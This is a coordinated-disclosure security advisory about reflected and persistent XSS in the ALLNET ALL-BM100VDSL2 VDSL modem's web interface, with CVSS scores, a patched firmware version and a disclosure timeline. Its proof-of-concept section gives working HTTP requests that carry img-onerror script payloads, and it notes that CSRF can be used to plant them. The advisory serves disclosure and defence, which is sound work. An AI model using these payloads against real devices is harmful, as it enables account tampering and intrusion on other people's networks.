VDSL Client Modem ALL-BM100VDSL2: XSS
Date: 2017-04-13 14:13:121. Introduction
| Affected Product: | VDSL Client Modem ALL-BM100VDSL2 C.4.6a |
| Fixed in: | C.4.8a |
| Fixed Version Link: | http://www.allnet.de/nc/de/allnet-brand/support/treiber-firmware/download/120183/ |
| Vendor Website: | http://www.allnet.de/ |
| Vulnerability Type: | XSS |
| Remote Exploitable: | Yes |
| Reported to vendor: | 12/20/2016 |
| Disclosed to public: | 04/13/2017 |
| Release mode: | Coordinated Release |
| CVE: | n/a (not requested) |
| Credits | Tim Coen & Marcus Gruber of Curesec GmbH |
2. Overview
The web interface of the VDSL Client Modem ALL-BM100VDSL2 is vulnerable to reflected as well as persistent XSS. A privileged user account is required to exploit the persistent XSS vulnerability but this can be bypassed via CSRF.
3. Details
Reflected XSS
CVSS: Medium 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Description: Each request to the web application that performs an action that changes the server state receives as reply a generic redirect response. The target of the redirect depends on the "page" variable submitted by the user. As the variable is echoed in a HTML attribute as well as a JavaScript context without proper encoding, it is vulnerable to reflected XSS.
Proof of Concept:
Request: POST /goform/ifx_set_system_password HTTP/1.1 Host: 192.168.0.100 page=system_password.html'"><img src=no onerror=alert(1)>&curr_user_id=1&submitflag=1&users=%3CNew+User%3E&userEnable=1&userNew=test3&user_passwd_edit_enable=1&userNewPswd=test&userConPswd=test&userLaccess=1&userRaccess=1&userFTPaccess=1&userSMBaccess=1 Response: <html><head> <script type="text/javascript"> location.href="/system_password.html'"><img src=no onerror=alert(1)>"; </script> </head><body> This document has moved to a new <a href="system_password.html'"><img src=no onerror=alert(1)>">location</a>. Please update your documents to reflect the new location. </body></html>
Persistent XSS
CVSS: Medium 4.3 CVSS:3.0/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
At least one field is vulnerable to persistent XSS, other values may be affected as well. A privileged user is required to place the payload, but an attacker can also use CSRF to place the payload.
Proof of Concept:
POST /goform/ifx_set_wizard_host HTTP/1.1 Host: 192.168.16.254 page=system_hostname.asp&HostName=dslcpe'"><img src=no onerror=alert(1)>&DomainName=vdsl.com Visiting http://192.168.16.254/system_hostname.asp triggers the payload.
4. Solution
To mitigate this issue please upgrade at least to version C.4.8a:
http://www.allnet.de/nc/de/allnet-brand/support/treiber-firmware/download/120183/
Please note that a newer version might already be available.
5. Report Timeline
| 12/20/2016 | Informed Vendor about Issue |
| 12/23/2016 | Vendor announces release of new firmware |
| 02/15/2017 | Reminded Vendor about disclosure date |
| 03/01/2017 | Vendor releases new Version |
| 04/13/2017 | Disclosed to public |